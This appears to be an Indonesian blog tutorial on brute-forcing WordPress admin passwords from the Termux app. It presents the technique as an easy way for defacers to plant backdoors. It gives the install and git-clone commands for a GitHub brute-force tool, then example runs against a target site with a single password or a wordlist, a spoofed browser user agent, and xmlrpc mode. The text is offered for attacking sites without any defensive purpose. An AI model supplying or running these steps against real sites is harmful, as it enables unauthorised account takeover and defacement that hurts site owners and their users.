BruteForce untuk admin halaman wordpress atau bisa disebut WBF menjadi salah satu cara mudah seorang defacer untuk memasukan akses backdoor di website. Serangan brute force ini masih jadi salah satu teknik kata sandi cracking paling populer yang dilakukan untuk meretas kata sandi. Sebelumnya kami telah membuat tutorial Wordpress BruteForce dengan C#, Cara ini hanya bisa dilakukan pada komputer/pc. Pada artikel kami ingin membuat tutorial BruteForce admin wordpress dengan termux.
Tutorial WBF Termux
Sebelumnya kamu langsung download aplikasi termux melalui playstore. selanjutnya install dan ketikan :
$ pkg install php
$ Pkg install git
$ git clone https://github.com/RandsX/wordpress-brute-forcephp wp -t site.com -u admin -p admin-u Adalah Username dan -p Adalah password
Dan Jika kamu mempunyai Wordlist dan ingin menggunakannya ketikan : php wp -t site.com -u admin -l pass.txt php wp -t site.com -u admin -l pass.txt -g="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15" String adalah ekstensi yang memungkinkan Anda untuk dengan mudah mengubah browser Anda
Untuk menggunakan mode standar atau mode xmlrpc, alat ini secara otomatis mendeteksi mode manual brute force kamu dalam target url. Fitur :
- Mode standar atau mode brute force xmlrpc
- protokol http dan https didukung
- Custom HTTP USER AGENT
